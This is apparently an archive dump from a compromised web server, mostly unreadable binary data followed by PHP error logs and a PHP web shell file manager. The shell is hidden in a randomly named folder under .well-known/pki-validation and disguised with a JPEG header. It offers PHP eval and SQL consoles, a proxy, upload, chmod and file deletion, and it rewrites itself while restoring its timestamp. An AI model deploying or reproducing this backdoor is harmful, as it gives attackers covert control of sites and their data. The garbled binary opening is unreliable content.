r,lr+b{&ǮrKϦ4yͧnw@y͓f͂v,ij >e64FH`ۜy;ӏuxfF a]Bi8FAjp3oGpVƳk;4wQV%9PkN? = :ղLՐփcz22dzV|XT⦖ ZjW@џb5͏{:C3!8`j˴4o5RݳI wb#{\0C~_dyp#fC1# }<3{J(6%Ѡ8˔m93- I:<:fXX3d0i YJq. ~l q_`p2fXUu1;طW r\ܕ'y@^:Y@2ʛMʌ=v4VǢ@f"8:p )V(zIטX `zuXk?|8+ASe!虩dKϕ?B8|Ec8 .+nRdgf Un-ӍLV{JdόAU,n KP<4 P{:ͧ6Syvi6y>_Zt*z2@دzTn9qf-/saQ r^Mx*/Enjq첾F9x^jzyp>h&f]oa/r!6;(GTi NB^I[DhJl[ro4QWʦQ^'ǁnyzP< ǹr:0ך.FZg^DadI퇒ܦ48FK!L{eͣjnRqbB*鋯$>:<'IsҺܶJNBWx#.(OZq0jM!w@*0ǬT=ZdsHjhPWM9wXnv>wL5k",d,aK ЍX_KzNńaXq"pbؒ!HcEi|$NM`6?=J>NQn:~ŨR]*?W gƞ@8 ֬rX #WJ;4@wybzht\@g]ot]<ڟIǹF5|/"!@SЇaeS7jK}$uz p4^(&@9P)Z0Fس ;cop7 uO[,X]W {>wٚmWɡ =͢) ݷwnψFPGk~j2t4H@ס_ ,934)ϖ/Xv$^_ &1`d K`'ȗ@E ~9Ï3cf 8q[|dYom"/749BOG(sC2\D_ 8;YKؙ5;/ XeRvoZmL鵅7_=ζm=[3Ơ99xF@T_kԣ…uuwc~SmJ)q(orj:=gPuϖel>t9&i=u?- 9h8x:qwc>|oK_*6rx,#Dȑ:Dr~&f7xٜ}9~iT`wkI'l_k@y'^ d̯_ ;Ewyuѹw 'A~m\R?~W]b݊ŏ>:ْ9 k>'GEޚTDa+"¹ϝ_V\s?xD=y:בD i(D6)H`*Q|Oep;yts<#E5a`w}Qʫ(NYQd? +KW'l jN_@t#Tb~<oB>af J_ȓ ہ(Mw,v'膇'] 0Z=z*LX)%:dΎ@;+Lۑ<4e|osƇ"0F985 l?5~tHoșTXM:r0=Ⱥ^rhˆ`ʞJSPC-~2 (ogؘ@4_IAޑ[NVqyЅ-'kՀ=X@tzsάH;q׆7~t۫:QX6p`p9!:_yO;Ɖᢧ|R+s2̑"<Ge*rs&9qx#:O=,jT߲I8hG짗[K8Kn=[ 8#Xy&26T.r~5ȗ37+𥯜wLE{.>6s>Pk  NȤAH*~cxj$̊f!^ :K:#OsiDw0 3.aPSWsnT|`+"We,l]O5s9'}NJDwo$0:8~+KnZ6O򗻾ZYҜ>1}rB;_4{/ w|b^T<]Et"{i rN;C5›+XK lNVMZpt›Mɀnd†4CoY&6R0y!0Q<i7f܌;rnC^+ja KqH S\ODtR< )~&5.KT([Sh&͎ot( *XLed[gQ6[T&4R.Z5H:pXhڌ. Rl"2(7C~ta"Kb/җ{mlj/Dge&Sj?crx.wX,We!.W" 2-MS\[G+(4Cdo=8D.N{4$W IX+dNBڴQƒ1FSVl]2@ޚ-=l,}0a#@YMUW+zA6M\upfb8. [5Q;Pa;#e@ _S~Lpl]Haggse>b A.[F4 4i#nQF#ӧ +,{Gu)G;&w*ޤ4`?He{Q ~-^^U[yy*+mn cs٤\rX:3ZvFio짷a*0V>yJox+*k7;lt|f a:njz,of-fWŮD`HZQt}$/YRWjh_QZ-X't&X{V,":iGT*#+pKR99Xp]%(HuآHxvɺ#>?|l ߏDS.9YL2i֒^'|sN_$C>}Xa8_VicM"j*g2;%j K Mab~A]3){ִ;!&e$p-WX,bc/`I2$۫ge:є|@2}ޔ (+m#&LRy$&r&lҿ:ڏ0K |GhWyy:Uo'VzgQ$˧@s򇵎LڠjP( \Ӷ&|ҏT6L+.UCR4@ AO eon`:?7"J\v>^ؒ(}GjXCBT}He  .4L#@RhHu2&Q͔9JRQCQ9Gٿ??^>_ a4_o&YrtX{j~wnPaVxu1a]\L_Xxf{ޛ@/d/:bww"#:0EmbEZ{'`$BW ;b z.ŁV ;Ruu\C-u~hop@Ǵ!A6q 6s@;hՄE@=jGѾ~ӏ֡~RbqIT("XCl[ ?LO,aA2-=Fv !c8uаa>+|ys6vp;}t*ruu?T==r%/gdU G). |Lc\n:SY't2% r4\7('E삣d4㷊lqA BA6` [vOqp*xaoD~F qw $}O7s #|#Hއ[q A G,~Hc4#x<,XxthL>ҬcL[j3N7oxGDϧO*AO&]}4Ÿ0Y)>ӟUfy%R๯F]c0Ӻ)4n.:ҏ^F )~]B:T@<ҨI*5XAښg V*A=7?=sC,r ox?tbgջGՎ:;JB[[ ijᒌ(*{<{5oQV}zuU5%HH&ȫflY$XY g·8\$O0CSs:q49^j=stjΉ&mL%nvàW~6}{~j>x6|= ^2Mj֢Sdɓm (=9ώ4jDt:/r ͦAGezuZ.[ӛ'=VBׅ!ƽOoͱi:bfB!Q'hXP3% Rׅ{Z i!aJAJR<ok=Ag-sEs';h z9ˉbs,gtQkUۙFy8fY]|%=`J(ՌW(51W=iX57L#A٫ R$?ȉPPimNZg˒LF:q&m31'!%x?m3xyHn52qٞ UcM[ މ1fHMSl'lpS)Y/) ALBvAlٻN@-|,liȴyuUW&Hl)%hG\fn TVV"j&{?$'_\ ,R3KGo嬾H2rfe0S@󔮩8eIyJ]3Dޞ&́ͭD:cFan6b"嚩\!,Nlm3|zNB;dg^3sA3t' E%l) LXŷm.#W-Frh nǩEKrm& !vsfT+ Ik6>ȴ9V.%ETڸȶ@Mj oo4K0-qs6З?@Jyȸ~ޙ;H.4ņuԂ50`|wcrp^㉢Օm4 Dzs-LX`I!r^  I8_,7D2ǂfg~1H8-$5"h*E/a&&ImtXK6$ҽ*:"o GFkl9PG*,2͜.zi痡Z.-nqjyk=b4˚3Nb5ZU\@Wu7j"d6wQU>(؆+k̿O1H: /ankQń6i\}2@0б%_oI@bb$d*YiV+fO1JIZuPتkW֖m ndNiCIxu-m}Ge[NI.qQ5{/yz.. TNU6[#IVua4뤄bq(髀sة߹rNY5 iq){kEsְTc< .yRK582v3 iBUxpZ~[K?ܽ{1e6bZMy͟w 1<VF]:2H歞2Κ*Mح)BiX!ٚ)*^5mu|skڛjy卥kʆ7=;%fuNo  IK桠\N56,Qj-ó=q(d|<%o.Kx g`<_Aǐ"IPL:9~bJv?IbT~jN)]x Ffv59f2lz/index.php000064400000000152151033415360007416 0ustar00sg0tex/index.php000064400000000147151033415360007601 0ustar00je53dt/error_log000064400000000226151033415360007560 0ustar00[27-Oct-2025 03:46:41 UTC] PHP Notice: Undefined index: uid in /home/gettoplisting/public_html/.well-known/pki-validation/je53dt/skbzl.php on line 1 ut5md8/index.php000064400000000150151033415360007507 0ustar00riuk7t/error_log000064400000002342151033415360007710 0ustar00[27-Oct-2025 03:45:37 UTC] PHP Notice: Undefined variable: authorization in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 20 [27-Oct-2025 03:45:37 UTC] PHP Notice: Undefined variable: translation in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 81 [27-Oct-2025 03:45:37 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/en.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 83 [07-Nov-2025 06:20:05 UTC] PHP Notice: Undefined variable: authorization in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 20 [07-Nov-2025 06:20:05 UTC] PHP Notice: Undefined variable: translation in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 81 [07-Nov-2025 06:20:05 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/.well-known/pki-validation/riuk7t/5sm1d.php on line 83 riuk7t/5sm1d.php000064400000231463151033415360007445 0ustar00ÿØÿà JFIF    ÿÛ „ ( %!1!%*+...983,7(-.- true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return '  '.$name.''; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.=''; } return $res; } function fm_lang_form ($current='en'){ return '

'; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '
'.stripslashes($vdump).'
'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' ' . __('Delete') . ''; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'
'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url(""); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '